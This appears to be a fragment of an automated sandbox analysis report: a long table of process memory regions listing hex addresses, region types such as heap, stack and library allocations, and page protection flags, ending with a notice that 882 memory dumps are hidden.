|
||
25A60DE0000
|
heap
|
page read and write
|
||
2990000
|
heap
|
page execute and read and write
|
||
1DBCC2D0000
|
heap
|
page read and write
|
||
7FFD34830000
|
trusted library allocation
|
page read and write
|
||
25A46960000
|
heap
|
page read and write
|
||
1DBCED4C000
|
trusted library allocation
|
page read and write
|
||
25C12D78000
|
heap
|
page read and write
|
||
1DBE6644000
|
heap
|
page read and write
|
||
24914740000
|
heap
|
page execute and read and write
|
||
7FFD34543000
|
trusted library allocation
|
page execute and read and write
|
||
BC038F7000
|
stack
|
page read and write
|
||
2492CD42000
|
heap
|
page read and write
|
||
7FFD34820000
|
trusted library allocation
|
page read and write
|
||
7FFD347F0000
|
trusted library allocation
|
page read and write
|
||
7FFD34610000
|
trusted library allocation
|
page read and write
|
||
25C14750000
|
trusted library allocation
|
page read and write
|
||
7FFD3458B000
|
trusted library allocation
|
page read and write
|
||
25C12F40000
|
heap
|
page read and write
|
||
25C15CEC000
|
trusted library allocation
|
page read and write
|
||
1DBE65FD000
|
heap
|
page read and write
|
||
7FFD3472A000
|
trusted library allocation
|
page read and write
|
||
7FFD348D0000
|
trusted library allocation
|
page read and write
|
||
25A58809000
|
trusted library allocation
|
page read and write
|
||
11A0000
|
trusted library allocation
|
page read and write
|
||
1DBCC2EA000
|
heap
|
page read and write
|
||
1DBCE833000
|
trusted library allocation
|
page read and write
|
||
7FFD347E0000
|
trusted library allocation
|
page read and write
|
||
25A46874000
|
heap
|
page read and write
|
||
25C2CED0000
|
heap
|
page read and write
|
||
7FFD34690000
|
trusted library allocation
|
page execute and read and write
|
||
1DBCE9F1000
|
trusted library allocation
|
page read and write
|
||
1A9D0000
|
trusted library allocation
|
page read and write
|
||
25A6092B000
|
heap
|
page read and write
|
||
25C12DB0000
|
heap
|
page read and write
|
||
7FFD34893000
|
trusted library allocation
|
page read and write
|
||
7FFD349C0000
|
trusted library allocation
|
page read and write
|
||
25C2D092000
|
heap
|
page read and write
|
||
1DBDE0B7000
|
trusted library allocation
|
page read and write
|
||
7FFD34560000
|
trusted library allocation
|
page read and write
|
||
BC0397D000
|
stack
|
page read and write
|
||
1DBCECE6000
|
trusted library allocation
|
page read and write
|
||
1CDBA000
|
stack
|
page read and write
|
||
7FFD348D2000
|
trusted library allocation
|
page read and write
|
||
7FFD34894000
|
trusted library allocation
|
page read and write
|
||
24915929000
|
trusted library allocation
|
page read and write
|
||
1DBCE008000
|
trusted library allocation
|
page read and write
|
||
7FFD348B0000
|
trusted library allocation
|
page read and write
|
||
25A4873A000
|
trusted library allocation
|
page read and write
|
||
24912BFD000
|
heap
|
page read and write
|
||
25A60960000
|
heap
|
page read and write
|
||
25C2D13D000
|
heap
|
page read and write
|
||
FFB000
|
stack
|
page read and write
|
||
24915756000
|
trusted library allocation
|
page read and write
|
||
2B76000
|
trusted library allocation
|
page read and write
|
||
7FFD34810000
|
trusted library allocation
|
page read and write
|
||
1DBE5DED000
|
heap
|
page read and write
|
||
2492CCC0000
|
heap
|
page execute and read and write
|
||
7FFD34830000
|
trusted library allocation
|
page read and write
|
||
25A48260000
|
trusted library allocation
|
page read and write
|
||
1DBCFC03000
|
trusted library allocation
|
page read and write
|
||
7FFD349C3000
|
trusted library allocation
|
page read and write
|
||
25A48220000
|
trusted library allocation
|
page read and write
|
||
56A104E000
|
stack
|
page read and write
|
||
BC036FE000
|
stack
|
page read and write
|
||
1DBE68B0000
|
heap
|
page read and write
|
||
24912BA0000
|
trusted library allocation
|
page read and write
|
||
1DBCC200000
|
heap
|
page read and write
|
||
25C2CFE0000
|
heap
|
page read and write
|
||
EF0A6CD000
|
stack
|
page read and write
|
||
1DBCC2C9000
|
heap
|
page read and write
|
||
25A468E7000
|
heap
|
page read and write
|
||
25C1626E000
|
trusted library allocation
|
page read and write
|
||
1DBCF1A5000
|
trusted library allocation
|
page read and write
|
||
7FFD345F6000
|
trusted library allocation
|
page read and write
|
||
7FFD3497E000
|
trusted library allocation
|
page read and write
|
||
7FFD348E0000
|
trusted library allocation
|
page read and write
|
||
7FFD34660000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD34840000
|
trusted library allocation
|
page read and write
|
||
7FFD3459D000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD346FA000
|
trusted library allocation
|
page read and write
|
||
7FFD34544000
|
trusted library allocation
|
page read and write
|
||
56A037E000
|
stack
|
page read and write
|
||
EF097FB000
|
stack
|
page read and write
|
||
1DBE65E1000
|
heap
|
page read and write
|
||
AF572BE000
|
stack
|
page read and write
|
||
EF099F8000
|
stack
|
page read and write
|
||
24924760000
|
trusted library allocation
|
page read and write
|
||
56A0FCC000
|
stack
|
page read and write
|
||
2492CDDE000
|
heap
|
page read and write
|
||
EF0A7CE000
|
stack
|
page read and write
|
||
25A49142000
|
trusted library allocation
|
page read and write
|
||
25C15B09000
|
trusted library allocation
|
page read and write
|
||
25C1632F000
|
trusted library allocation
|
page read and write
|
||
569FCFD000
|
stack
|
page read and write
|
||
7FFD348C9000
|
trusted library allocation
|
page read and write
|
||
25A60980000
|
heap
|
page read and write
|
||
7FFD348C4000
|
trusted library allocation
|
page read and write
|
||
7FFD347D0000
|
trusted library allocation
|
page read and write
|
||
7FFD349A0000
|
trusted library allocation
|
page read and write
|
||
24912B80000
|
trusted library allocation
|
page read and write
|
||
24912A00000
|
heap
|
page read and write
|
||
7FFD348C2000
|
trusted library allocation
|
page read and write
|
||
25C24CD1000
|
trusted library allocation
|
page read and write
|
||
7FFD34620000
|
trusted library allocation
|
page read and write
|
||
BC0387F000
|
stack
|
page read and write
|
||
7FFD34700000
|
trusted library allocation
|
page execute and read and write
|
||
249145C6000
|
heap
|
page read and write
|
||
25C15C8B000
|
trusted library allocation
|
page read and write
|
||
25A587FF000
|
trusted library allocation
|
page read and write
|
||
25C2D135000
|
heap
|
page read and write
|
||
1DBCF55F000
|
trusted library allocation
|
page read and write
|
||
7FFD34950000
|
trusted library allocation
|
page read and write
|
||
1DBDDDF0000
|
trusted library allocation
|
page read and write
|
||
11C0000
|
trusted library allocation
|
page read and write
|
||
24915AD5000
|
trusted library allocation
|
page read and write
|
||
25A60ACE000
|
heap
|
page read and write
|
||
1DBCF086000
|
trusted library allocation
|
page read and write
|
||
7FFD34564000
|
trusted library allocation
|
page read and write
|
||
7FFD34580000
|
trusted library allocation
|
page read and write
|
||
25C14EAD000
|
trusted library allocation
|
page read and write
|
||
25C148B0000
|
heap
|
page execute and read and write
|
||
2492CDBF000
|
heap
|
page read and write
|
||
1DBCF72C000
|
trusted library allocation
|
page read and write
|
||
24915962000
|
trusted library allocation
|
page read and write
|
||
9E0000
|
heap
|
page read and write
|
||
25A468A4000
|
heap
|
page read and write
|
||
25A60885000
|
heap
|
page read and write
|
||
25A588B7000
|
trusted library allocation
|
page read and write
|
||
EF0000
|
heap
|
page read and write
|
||
7FFD34890000
|
trusted library allocation
|
page read and write
|
||
25A468EB000
|
heap
|
page read and write
|
||
25A60C80000
|
trusted library allocation
|
page read and write
|
||
EF09BFF000
|
stack
|
page read and write
|
||
25A60B4A000
|
heap
|
page read and write
|
||
1B7B5000
|
heap
|
page read and write
|
||
2492CCEC000
|
heap
|
page read and write
|
||
25A58807000
|
trusted library allocation
|
page read and write
|
||
7FFD347A0000
|
trusted library allocation
|
page read and write
|
||
24924751000
|
trusted library allocation
|
page read and write
|
||
DB2000
|
heap
|
page read and write
|
||
7FFD34980000
|
trusted library allocation
|
page read and write
|
||
7FFD347C0000
|
trusted library allocation
|
page read and write
|
||
1DBE62CB000
|
heap
|
page read and write
|
||
7FFD34620000
|
trusted library allocation
|
page read and write
|
||
ECC000
|
stack
|
page read and write
|
||
CD0000
|
heap
|
page read and write
|
||
569FFFD000
|
stack
|
page read and write
|
||
EF09AFE000
|
stack
|
page read and write
|
||
1C2EB000
|
heap
|
page read and write
|
||
7DF4B2FD0000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD346E0000
|
trusted library allocation
|
page read and write
|
||
EF0A64E000
|
stack
|
page read and write
|
||
24912B00000
|
heap
|
page read and write
|
||
7FFD34590000
|
trusted library allocation
|
page read and write
|
||
2492CCFC000
|
heap
|
page read and write
|
||
7FFD34900000
|
trusted library allocation
|
page read and write
|
||
25C2CF0E000
|
heap
|
page read and write
|
||
1C2E9000
|
heap
|
page read and write
|
||
7FFD34573000
|
trusted library allocation
|
page execute and read and write
|
||
1DBCDDD0000
|
heap
|
page read and write
|
||
1DBCF0E7000
|
trusted library allocation
|
page read and write
|
||
25A608BF000
|
heap
|
page read and write
|
||
1C8EC000
|
stack
|
page read and write
|
||
7FFD34702000
|
trusted library allocation
|
page read and write
|
||
7FFD348F0000
|
trusted library allocation
|
page read and write
|
||
7FFD34830000
|
trusted library allocation
|
page read and write
|
||
25C12DB2000
|
heap
|
page read and write
|
||
25A58511000
|
trusted library allocation
|
page read and write
|
||
7FFD34690000
|
trusted library allocation
|
page execute and read and write
|
||
25A60BD2000
|
heap
|
page read and write
|
||
25C15A9F000
|
trusted library allocation
|
page read and write
|
||
7FFD34540000
|
trusted library allocation
|
page read and write
|
||
25C12DCE000
|
heap
|
page read and write
|
||
1DBCC210000
|
heap
|
page read and write
|
||
2492CB03000
|
heap
|
page read and write
|
||
7FFD34740000
|
trusted library allocation
|
page read and write
|
||
7FFD34899000
|
trusted library allocation
|
page read and write
|
||
25C12DF6000
|
heap
|
page read and write
|
||
7DF4B2FE0000
|
trusted library allocation
|
page execute and read and write
|
||
BC03BB8000
|
stack
|
page read and write
|
||
EF0938E000
|
stack
|
page read and write
|
||
7FFD347A0000
|
trusted library allocation
|
page read and write
|
||
25A468A0000
|
heap
|
page read and write
|
||
24912BFF000
|
heap
|
page read and write
|
||
7DF46C340000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD3462C000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD348C8000
|
trusted library allocation
|
page read and write
|
||
7FFD348C0000
|
trusted library allocation
|
page read and write
|
||
7FFD348CC000
|
trusted library allocation
|
page read and write
|
||
7FFD349D0000
|
trusted library allocation
|
page read and write
|
||
7FFD34890000
|
trusted library allocation
|
page read and write
|
||
7FFD34758000
|
trusted library allocation
|
page read and write
|
||
7FFD34990000
|
trusted library allocation
|
page read and write
|
||
7FFD3462C000
|
trusted library allocation
|
page execute and read and write
|
||
569FE79000
|
stack
|
page read and write
|
||
7FFD347A0000
|
trusted library allocation
|
page read and write
|
||
25C12E5D000
|
heap
|
page read and write
|
||
7FFD3457D000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD34570000
|
trusted library allocation
|
page read and write
|
||
7FFD347F0000
|
trusted library allocation
|
page read and write
|
||
25C12D30000
|
heap
|
page read and write
|
||
2492CF00000
|
trusted library allocation
|
page read and write
|
||
7FFD34860000
|
trusted library allocation
|
page read and write
|
||
7FFD3461C000
|
trusted library allocation
|
page execute and read and write
|
||
BC03A3E000
|
stack
|
page read and write
|
||
1DBE63C0000
|
heap
|
page read and write
|
||
25C2D03F000
|
heap
|
page read and write
|
||
7DF491660000
|
trusted library allocation
|
page execute and read and write
|
||
25A46980000
|
heap
|
page read and write
|
||
7FFD3455B000
|
trusted library allocation
|
page read and write
|
||
7FFD3457D000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD34712000
|
trusted library allocation
|
page read and write
|
||
7DF479560000
|
trusted library allocation
|
page execute and read and write
|
||
9A0000
|
heap
|
page read and write
|
||
25C12D00000
|
heap
|
page read and write
|
||
25A49632000
|
trusted library allocation
|
page read and write
|
||
25A46B60000
|
heap
|
page read and write
|
||
1BDED000
|
stack
|
page read and write
|
||
2492CA98000
|
heap
|
page read and write
|
||
7FFD34780000
|
trusted library allocation
|
page read and write
|
||
25C149D0000
|
heap
|
page read and write
|
||
569FDFE000
|
stack
|
page read and write
|
||
7FFD34570000
|
trusted library allocation
|
page read and write
|
||
7FFD34542000
|
trusted library allocation
|
page read and write
|
||
25C12DD2000
|
heap
|
page read and write
|
||
7FFD347E0000
|
trusted library allocation
|
page read and write
|
||
1B3A0000
|
heap
|
page execute and read and write
|
||
9C0000
|
heap
|
page read and write
|
||
D95000
|
heap
|
page read and write
|
||
56A03FB000
|
stack
|
page read and write
|
||
11D0000
|
heap
|
page read and write
|
||
25A481D0000
|
trusted library allocation
|
page read and write
|
||
25A482C0000
|
heap
|
page read and write
|
||
7FFD34710000
|
trusted library allocation
|
page execute and read and write
|
||
56A00F8000
|
stack
|
page read and write
|
||
7FFD34583000
|
trusted library allocation
|
page read and write
|
||
7FFD34570000
|
trusted library allocation
|
page read and write
|
||
11E0000
|
trusted library allocation
|
page read and write
|
||
EF09283000
|
stack
|
page read and write
|
||
7FFD347B0000
|
trusted library allocation
|
page read and write
|
||
7FFD34750000
|
trusted library allocation
|
page read and write
|
||
7FFD34963000
|
trusted library allocation
|
page read and write
|
||
EF0A74E000
|
stack
|
page read and write
|
||
1DBCDD10000
|
heap
|
page read and write
|
||
1C323000
|
heap
|
page read and write
|
||
25A497B9000
|
trusted library allocation
|
page read and write
|
||
7FFD34594000
|
trusted library allocation
|
page read and write
|
||
EF09B7F000
|
stack
|
page read and write
|
||
1DBCC4C0000
|
heap
|
page readonly
|
||
249159A0000
|
trusted library allocation
|
page read and write
|
||
1DBCC230000
|
heap
|
page read and write
|
||
AF571B8000
|
stack
|
page read and write
|
||
7FFD34870000
|
trusted library allocation
|
page read and write
|
||
25A46780000
|
heap
|
page read and write
|
||
25A60AF4000
|
heap
|
page read and write
|
||
7FFD34840000
|
trusted library allocation
|
page read and write
|
||
56A0E4C000
|
stack
|
page read and write
|
||
7FFD347E0000
|
trusted library allocation
|
page read and write
|
||
25C249E1000
|
trusted library allocation
|
page read and write
|
||
7FFD34748000
|
trusted library allocation
|
page read and write
|
||
7FFD34880000
|
trusted library allocation
|
page read and write
|
||
7FFD349D0000
|
trusted library allocation
|
page read and write
|
||
2492CBB0000
|
heap
|
page execute and read and write
|
||
1DBCC480000
|
trusted library allocation
|
page read and write
|
||
1DBE651D000
|
heap
|
page read and write
|
||
25A49541000
|
trusted library allocation
|
page read and write
|
||
25A483D4000
|
heap
|
page read and write
|
||
25C24CCC000
|
trusted library allocation
|
page read and write
|
||
25A60A70000
|
heap
|
page read and write
|
||
1C9E0000
|
heap
|
page read and write
|
||
2492CA90000
|
heap
|
page read and write
|
||
24912C0B000
|
heap
|
page read and write
|
||
7FFD34724000
|
trusted library allocation
|
page read and write
|
||
7FFD34850000
|
trusted library allocation
|
page read and write
|
||
7FFD34800000
|
trusted library allocation
|
page read and write
|
||
1DBE6500000
|
heap
|
page read and write
|
||
1DBCC4A0000
|
trusted library allocation
|
page read and write
|
||
7FFD34950000
|
trusted library allocation
|
page read and write
|
||
1DBE6633000
|
heap
|
page read and write
|
||
56A027E000
|
stack
|
page read and write
|
||
7FFD34573000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD349B0000
|
trusted library allocation
|
page read and write
|
||
25C15950000
|
trusted library allocation
|
page read and write
|
||
1DBCC313000
|
heap
|
page read and write
|
||
7FFD348B4000
|
trusted library allocation
|
page read and write
|
||
7FFD34820000
|
trusted library allocation
|
page read and write
|
||
1DBCF66B000
|
trusted library allocation
|
page read and write
|
||
7FFD348A0000
|
trusted library allocation
|
page read and write
|
||
7FFD34850000
|
trusted library allocation
|
page read and write
|
||
7FFD34790000
|
trusted library allocation
|
page read and write
|
||
24912C44000
|
heap
|
page read and write
|
||
25A48500000
|
heap
|
page execute and read and write
|
||
AF57F87000
|
stack
|
page read and write
|
||
EF09979000
|
stack
|
page read and write
|
||
D8F000
|
heap
|
page read and write
|
||
24912E15000
|
heap
|
page read and write
|
||
1DBE6700000
|
trusted library allocation
|
page read and write
|
||
569FEFE000
|
stack
|
page read and write
|
||
24915782000
|
trusted library allocation
|
page read and write
|
||
24915FB5000
|
trusted library allocation
|
page read and write
|
||
7FFD348D5000
|
trusted library allocation
|
page read and write
|
||
25C16801000
|
trusted library allocation
|
page read and write
|
||
2491534C000
|
trusted library allocation
|
page read and write
|
||
24915ECF000
|
trusted library allocation
|
page read and write
|
||
25A58801000
|
trusted library allocation
|
page read and write
|
||
24912B40000
|
heap
|
page read and write
|
||
7FFD34700000
|
trusted library allocation
|
page read and write
|
||
1DBDE0CC000
|
trusted library allocation
|
page read and write
|
||
7FFD345CC000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD348A3000
|
trusted library allocation
|
page read and write
|
||
7FFD3456D000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD348E0000
|
trusted library allocation
|
page read and write
|
||
1DBCC4E0000
|
heap
|
page read and write
|
||
25A60BBE000
|
heap
|
page read and write
|
||
25A58531000
|
trusted library allocation
|
page read and write
|
||
1DBCEB5D000
|
trusted library allocation
|
page read and write
|
||
7FFD347D0000
|
trusted library allocation
|
page read and write
|
||
25A587FB000
|
trusted library allocation
|
page read and write
|
||
1DBDDE11000
|
trusted library allocation
|
page read and write
|
||
7FFD348C9000
|
trusted library allocation
|
page read and write
|
||
25C14760000
|
heap
|
page readonly
|
||
2491656E000
|
trusted library allocation
|
page read and write
|
||
1DBCED58000
|
trusted library allocation
|
page read and write
|
||
7FFD34722000
|
trusted library allocation
|
page read and write
|
||
1DBCC460000
|
trusted library section
|
page read and write
|
||
25A60957000
|
heap
|
page execute and read and write
|
||
7FFD34573000
|
trusted library allocation
|
page execute and read and write
|
||
1DBCE2AD000
|
trusted library allocation
|
page read and write
|
||
25C12DAE000
|
heap
|
page read and write
|
||
2963000
|
heap
|
page read and write
|
||
7F0000
|
unkown
|
page readonly
|
||
7FFD34760000
|
trusted library allocation
|
page execute and read and write
|
||
56A0078000
|
stack
|
page read and write
|
||
25C2D131000
|
heap
|
page read and write
|
||
25C15A18000
|
trusted library allocation
|
page read and write
|
||
25C14A67000
|
trusted library allocation
|
page read and write
|
||
7FFD34616000
|
trusted library allocation
|
page read and write
|
||
24912B60000
|
trusted library section
|
page read and write
|
||
7FFD34996000
|
trusted library allocation
|
page read and write
|
||
56A02FE000
|
stack
|
page read and write
|
||
25C15BBF000
|
trusted library allocation
|
page read and write
|
||
BC03E3B000
|
stack
|
page read and write
|
||
2492CD22000
|
heap
|
page read and write
|
||
7FFD34728000
|
trusted library allocation
|
page read and write
|
||
7FFD34790000
|
trusted library allocation
|
page read and write
|
||
25C2CE15000
|
heap
|
page read and write
|
||
7FFD34990000
|
trusted library allocation
|
page read and write
|
||
25A608CE000
|
heap
|
page read and write
|
||
990000
|
heap
|
page read and write
|
||
1C1DE000
|
stack
|
page read and write
|
||
24924781000
|
trusted library allocation
|
page read and write
|
||
EF0930E000
|
stack
|
page read and write
|
||
7FFD34850000
|
trusted library allocation
|
page read and write
|
||
7FFD34580000
|
trusted library allocation
|
page read and write
|
||
25C2D200000
|
trusted library allocation
|
page read and write
|
||
AF5733E000
|
stack
|
page read and write
|
||
1DBCF6CE000
|
trusted library allocation
|
page read and write
|
||
7FFD34740000
|
trusted library allocation
|
page execute and read and write
|
||
2492CCF8000
|
heap
|
page read and write
|
||
D92000
|
heap
|
page read and write
|
||
7FFD349B0000
|
trusted library allocation
|
page read and write
|
||
25A608E3000
|
heap
|
page read and write
|
||
24912D30000
|
trusted library allocation
|
page read and write
|
||
7FFD34770000
|
trusted library allocation
|
page read and write
|
||
7FFD348D8000
|
trusted library allocation
|
page read and write
|
||
7FFD349B0000
|
trusted library allocation
|
page read and write
|
||
7FF4400C0000
|
trusted library allocation
|
page execute and read and write
|
||
249151A3000
|
trusted library allocation
|
page read and write
|
||
24912C09000
|
heap
|
page read and write
|
||
25C16162000
|
trusted library allocation
|
page read and write
|
||
24916529000
|
trusted library allocation
|
page read and write
|
||
25C12D70000
|
heap
|
page read and write
|
||
24924771000
|
trusted library allocation
|
page read and write
|
||
7FFD34800000
|
trusted library allocation
|
page read and write
|
||
25C15432000
|
trusted library allocation
|
page read and write
|
||
25A608E8000
|
heap
|
page read and write
|
||
7FFD34790000
|
trusted library allocation
|
page read and write
|
||
7FFD349A0000
|
trusted library allocation
|
page execute and read and write
|
||
25A49E6E000
|
trusted library allocation
|
page read and write
|
||
AF57E8C000
|
stack
|
page read and write
|
||
7FFD3496C000
|
trusted library allocation
|
page read and write
|
||
25A60BE7000
|
heap
|
page read and write
|
||
2492CCE4000
|
heap
|
page read and write
|
||
BC0377E000
|
stack
|
page read and write
|
||
25A49544000
|
trusted library allocation
|
page read and write
|
||
25A49D7A000
|
trusted library allocation
|
page read and write
|
||
7FFD34840000
|
trusted library allocation
|
page read and write
|
||
249247C3000
|
trusted library allocation
|
page read and write
|
||
25C12DBA000
|
heap
|
page read and write
|
||
7FFD34880000
|
trusted library allocation
|
page read and write
|
||
1DBCC4E5000
|
heap
|
page read and write
|
||
1DBCC2D4000
|
heap
|
page read and write
|
||
2492CF70000
|
heap
|
page read and write
|
||
7FFD348F0000
|
trusted library allocation
|
page read and write
|
||
7FFD3454D000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD34800000
|
trusted library allocation
|
page read and write
|
||
CFC000
|
heap
|
page read and write
|
||
25A46B65000
|
heap
|
page read and write
|
||
25A60BA0000
|
heap
|
page read and write
|
||
7FFD34574000
|
trusted library allocation
|
page read and write
|
||
7FFD34820000
|
trusted library allocation
|
page read and write
|
||
7FFD347F0000
|
trusted library allocation
|
page read and write
|
||
1DBCFBB9000
|
trusted library allocation
|
page read and write
|
||
1DBCED47000
|
trusted library allocation
|
page read and write
|
||
25C12DBC000
|
heap
|
page read and write
|
||
BC039F9000
|
stack
|
page read and write
|
||
249155DD000
|
trusted library allocation
|
page read and write
|
||
7FFD34710000
|
trusted library allocation
|
page read and write
|
||
1DBE6515000
|
heap
|
page read and write
|
||
1DBE65E6000
|
heap
|
page read and write
|
||
7FFD348A8000
|
trusted library allocation
|
page read and write
|
||
25A60AC2000
|
heap
|
page read and write
|
||
25A48F63000
|
trusted library allocation
|
page read and write
|
||
7DF479550000
|
trusted library allocation
|
page execute and read and write
|
||
1DBCDD96000
|
heap
|
page execute and read and write
|
||
25C24CDA000
|
trusted library allocation
|
page read and write
|
||
1DBCED50000
|
trusted library allocation
|
page read and write
|
||
25A489DE000
|
trusted library allocation
|
page read and write
|
||
7FFD348AC000
|
trusted library allocation
|
page read and write
|
||
24924A5B000
|
trusted library allocation
|
page read and write
|
||
11F5000
|
heap
|
page read and write
|
||
1B4AE000
|
stack
|
page read and write
|
||
24912E10000
|
heap
|
page read and write
|
||
2491609C000
|
trusted library allocation
|
page read and write
|
||
EF0977E000
|
stack
|
page read and write
|
||
2491603E000
|
trusted library allocation
|
page read and write
|
||
7FFD34656000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD34626000
|
trusted library allocation
|
page read and write
|
||
25A4A338000
|
trusted library allocation
|
page read and write
|
||
7FFD3459C000
|
trusted library allocation
|
page execute and read and write
|
||
290E000
|
stack
|
page read and write
|
||
1DBCE9E7000
|
trusted library allocation
|
page read and write
|
||
7FFD34880000
|
trusted library allocation
|
page read and write
|
||
7FFD348A0000
|
trusted library allocation
|
page read and write
|
||
11E3000
|
trusted library allocation
|
page read and write
|
||
7FFD349C0000
|
trusted library allocation
|
page read and write
|
||
7FFD3494C000
|
trusted library allocation
|
page read and write
|
||
25C2CEA0000
|
heap
|
page execute and read and write
|
||
25A60878000
|
heap
|
page read and write
|
||
25C2D061000
|
heap
|
page read and write
|
||
25A4966C000
|
trusted library allocation
|
page read and write
|
||
249159F7000
|
trusted library allocation
|
page read and write
|
||
7DF491650000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD34572000
|
trusted library allocation
|
page read and write
|
||
25A6089B000
|
heap
|
page read and write
|
||
7FFD34770000
|
trusted library allocation
|
page read and write
|
||
7FFD34626000
|
trusted library allocation
|
page read and write
|
||
1DBCDE5B000
|
trusted library allocation
|
page read and write
|
||
7FFD34560000
|
trusted library allocation
|
page read and write
|
||
7FFD34758000
|
trusted library allocation
|
page read and write
|
||
2491654E000
|
trusted library allocation
|
page read and write
|
||
25C12D10000
|
heap
|
page read and write
|
||
7FFD349D0000
|
trusted library allocation
|
page read and write
|
||
7FFD34711000
|
trusted library allocation
|
page read and write
|
||
7FFD348C0000
|
trusted library allocation
|
page read and write
|
||
1DBCEFB8000
|
trusted library allocation
|
page read and write
|
||
AF56C72000
|
stack
|
page read and write
|
||
EF098F7000
|
stack
|
page read and write
|
||
7FFD34630000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD34720000
|
trusted library allocation
|
page execute and read and write
|
||
25C1595D000
|
trusted library allocation
|
page read and write
|
||
24915871000
|
trusted library allocation
|
page read and write
|
||
2492CBB6000
|
heap
|
page execute and read and write
|
||
1DBCC298000
|
heap
|
page read and write
|
||
25A60B82000
|
heap
|
page read and write
|
||
25C12E69000
|
heap
|
page read and write
|
||
24915FDB000
|
trusted library allocation
|
page read and write
|
||
AF570BF000
|
stack
|
page read and write
|
||
BC04909000
|
stack
|
page read and write
|
||
25A60873000
|
heap
|
page read and write
|
||
25A49C94000
|
trusted library allocation
|
page read and write
|
||
7FFD34860000
|
trusted library allocation
|
page read and write
|
||
56A0F49000
|
stack
|
page read and write
|
||
EF0A9CE000
|
stack
|
page read and write
|
||
25A484E0000
|
heap
|
page execute and read and write
|
||
1CEBA000
|
stack
|
page read and write
|
||
25A60A60000
|
heap
|
page read and write
|
||
25C24A53000
|
trusted library allocation
|
page read and write
|
||
7FFD346E2000
|
trusted library allocation
|
page read and write
|
||
7FFD34930000
|
trusted library allocation
|
page read and write
|
||
25A481B0000
|
trusted library allocation
|
page read and write
|
||
AF56F79000
|
stack
|
page read and write
|
||
25C2CDC6000
|
heap
|
page read and write
|
||
25A498D6000
|
trusted library allocation
|
page read and write
|
||
BC03C3F000
|
stack
|
page read and write
|
||
25A4A2EE000
|
trusted library allocation
|
page read and write
|
||
2492CE78000
|
heap
|
page read and write
|
||
25A60BDE000
|
heap
|
page read and write
|
||
7FFD34730000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD34870000
|
trusted library allocation
|
page read and write
|
||
BC03AB7000
|
stack
|
page read and write
|
||
BC03B37000
|
stack
|
page read and write
|
||
25C1594C000
|
trusted library allocation
|
page read and write
|
||
25A60940000
|
heap
|
page read and write
|
||
7FFD34580000
|
trusted library allocation
|
page read and write
|
||
7FFD3458B000
|
trusted library allocation
|
page read and write
|
||
25A589B9000
|
trusted library allocation
|
page read and write
|
||
7FFD348DA000
|
trusted library allocation
|
page read and write
|
||
1DBCC4D0000
|
trusted library allocation
|
page read and write
|
||
25C155F1000
|
trusted library allocation
|
page read and write
|
||
24915A59000
|
trusted library allocation
|
page read and write
|
There are 882 hidden memdumps, click here to show them.